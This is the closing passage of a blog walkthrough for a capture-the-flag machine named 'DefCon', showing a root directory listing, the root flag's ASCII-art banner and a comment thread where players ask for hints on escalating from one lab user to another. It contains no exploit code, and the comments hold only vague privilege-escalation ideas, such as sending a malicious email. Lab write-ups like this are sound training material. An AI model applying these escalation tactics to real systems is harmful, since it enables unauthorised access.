drwx------  3 root root 4.0K Jun  9  2019 .gnupg
drwx------  2 root root 4.0K Jun  9  2019 .gvfs
-rw-------  1 root root  338 Jun  9  2019 .ICEauthority
-rw-------  1 root root   39 Jun 10  2019 .lesshst
drwxr-xr-x  3 root root 4.0K May 14  2019 .local
drwx------  2 root root 4.0K Mar 10  2018 .mozc
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Music
-rw-------  1 root root 2.3K Apr 10 19:49 .mysql_history
-rw-r--r--  1 root root   30 Apr 10 13:09 names
drwxr-xr-x  2 root root 4.0K Jun 13  2018 .nano
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Pictures
drwx------  3 root root 4.0K May 14  2019 .pki
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Public
-rw-------  1 root root 1.0K Jun 10  2019 .rnd
-rw-r--r--  1 root root 7.8K Apr 10 20:44 root.txt
drwxr-xr-x  3 root root 4.0K Jun  9  2019 snap
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Templates
drwxr-xr-t  2 root root 4.0K Jun  9  2019 thinclient_drives
drwxr-xr-x  2 root root 4.0K Jun  9  2019 Videos
drwxr-xr-x  2 root root 4.0K May 11  2019 .vim
-rw-------  1 root root  14K Apr 10 21:45 .viminfo
drwx------  2 root root 4.0K Jun  9  2019 .vnc
-rw-------  1 root root   56 Jun  9  2019 .Xauthority
-rw-------  1 root root 2.4K Jun  9  2019 .xsession-errors
root@nsa-server:~# cat root.txt 


░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░▓████████████████████████▒░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░▓█████▓▒░░░░░░░░░░░░░░░▒██████▒░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░████▒░░░░░░░░░░░░░░░░░░░░░░░░░▓███▒░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░
░░░░░░░░░░░░░▒██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒██░░░░░░░░░░░░░░
░░░░░░░░░░░░▒██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░░░░░
░░░░░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░░░░
░░░░░░░░░░░██▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░░██░░░░░░░░░░░░
░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░
░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░
░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░
░░░░░░░░░░░██▒░██▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██▓░▒██░░░░░░░░░░░
░░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░░
░░░░░░░░░░░░██▒░██░░░░░▒▒▓███▒░░░░░░░▒███▓▒▒░░░░░██░▓██░░░░░░░░░░░░
░░░░░░░░░░░░░██░██░░██████████▒░░░░░▓██████████░░██▒██░░░░░░░░░░░░░
░░░░░░░░░░░░░░████░████████████░░░░░████████████░████░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░███░▒██████████░░░░░░░██████████▒░██▒░░░░░░░░░▒░░░░░
░░░▒████░░░░░░░▓█▒░░█████████░░░░░░░░░█████████░░▒█▓░░░░░░▓████░░░░
░░░██░▒██▒░░░░░██░░░░██████▓░░░░█░█░░░░███████░░░░██░░░░░███░░██░░░
░░░██░░░██▓░░░░██░░░░░░▒▓▓░░░░▒██░██░░░░░▓▓▒░░░░░▒██░░░░███░░░██░░░
░▓██▒░░░░████▓░░██░░░░░░░░░░░░███░███░░░░░░░░░░░░██░░█████░░░░▓██▒░
██▓░░░░░░░░▒████████▓░░░░░░░░████░███▓░░░░░░░▒▓████████░░░░░░░░░███
██▓▒▓███▓░░░░░░▓████████▓░░░░████░███▓░░░░▓████████▓░░░░░░████▓▓███
░███████████▒░░░░░░███████░░░░██░░░██░░░░██████▓░░░░░░▓███████████░
░░░░░░░░░░▓█████░░░░██▓▓░██░░░░░░░░░░░░░██░█▒██░░░▒█████▓░░░░░░░░░░
░░░░░░░░░░░░░▒█████▒▒█▓█░███▓▓▒▒▒▓▒▒▓▓▓███▒███░▓█████░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░▒████▒▓█▒▒█░█▒█░█░█▓█▒█▓░█░█████▒░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░░░░██░░██▓█▓█▓█▒█▒█▓█▓████░▓█▓░░░░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░░░░░▓████▓░▓█▓█░█▒█░█░█▒█▒███▒░██████░░░░░░░░░░░░░░░░░
░░░░░░░░░░░░░▓█████░░██░░░▒█████▓█▓█████▒░░░██░▒█████▓░░░░░░░░░░░░░
░░░░▒██████████▓░░░░░███░░░░░░░░░░░░░░░░░░░██▒░░░░░▓██████████▒░░░░
░░░░██░░░▓▓▓░░░░░░▒██████▓░░░░░░░░░░░░░░░███████▒░░░░░░▓▓▒░░▒██░░░░
░░░░▓██░░░░░░░░▓████▓░░░█████▒░░░░░░▒▓█████░░░▓████▓░░░░░░░▒██▓░░░░
░░░░░░███░░░░████▒░░░░░░░░▓█████████████▒░░░░░░░░▒████░░░░███░░░░░░
░░░░░░░██░░░██▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓██░░░██░░░░░░░
░░░░░░░██▒▓██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒██▒▓██░░░░░░░
░░░░░░░░████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░████░░░░░░░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

CONGRATULATIONS!!!!

YOU JUST PWND THIS MACHINE

— finished —

 

And there you have it.
I really hope you liked this machine and the challenges it presented.
A shout-out would be appreciated and good luck with your next challenge….

24 thoughts on “DefCon

  1. hi bro,why did I add nsa-server.net nsa-secretserver.net resolution under hosts, or redirect to nsa-server.net.
    in hosts:
    192.168.123.19 nsa-server.net nsa-secretserver.net

    1. the /etc/hosts file is used by your system to lookup hosts when connecting to them through domain name instead of IP address.
      when your system wants to connect to another system by the use of a domain name and it doesn’t know the IP address, it uses the name-servers that are available in its configuration (DNS).
      but before it looks for the name-servers, it will check the hosts file first.

  2. Hi,
    I’d like to get a tiny nudge / push in the right direction for user “Smith”. Spend already more than a day on this user but nothing. None of the common tools or manual enumeration helped me.
    Thanks!

        1. Which users do you already have compromised and from which user do you try to jump to user smith?

          1. I have done: John > George > Samantha > Nicky
            I need user Smith and Root.

          2. In this phase…..a basic recon is required.
            You need to know what is happening on this machine and who has access to what.
            When you figure that out, the solution is in front of you.

  3. The only thing I found is:

    Both John and Smith are member of the group ‘mail’. I read a comment between John and Graham about Smith is possibly reading their email. So maybe send some malicious email from John to Smith ?`

    I already have tried something like that but untill now not managed to get that worked and I am not sure it Smith is reading his mail every one and then?!

    P.s.: If this message is too much spoiler then please reply by email to me please !

      1. Bedankt voor de email. Heb je mijn reactie daarop ook gehad (ik zag dat je een tijdelijk emailadres gebruikte) ?!

        Ik vermoed dat jouw hint ging over Smith -> Root (dat zal via [SPOILER] gaan?!), maar ik moet eerst Smith zien te worden via een van de andere gebruikers (Nicky, Samantha, John of Graham) en daar zou ik graag een hint over willen 🙂

          1. I have the same question, I’m with user “Nicky” and I’m looking for a way to pass to user “Smith”, could you give me some hint? (Do it by mail to avoid the spoiler). Thanks in advance.

          2. With a basic recon, you will find something on the system that user Nicky has access too.
            To get access you need a piece of information you probably don’t have yet, because of the way you escalated to this user.
            Once you find those 2 things, the way to user smith will become clear.

          3. Ik heb op de 20e geen email ontvangen! Kun je hem nog eens doorsturen aub?

  4. why is user smith that hard to escalate to?
    ive been turning every stone in this machine and apparently i must have missed something…
    connecting with v.. to that desktop didnt reveal anything that i havent seen from the terminal session.
    im really stuck and would appreciate a small nudge to proceed

    1. Escalating to user smith isn’t that hard (I know it’s easy for me to say), but the path to take is relatively easy when you have all the information.
      Look for files, then look for a service (you really need the file or no access to this service, enumerate your findings and escalate to user smith.

      I just added escalating from Samantha to Nicky and I’ll be posting getting to smith next week.

Leave a Reply to b. Cancel reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.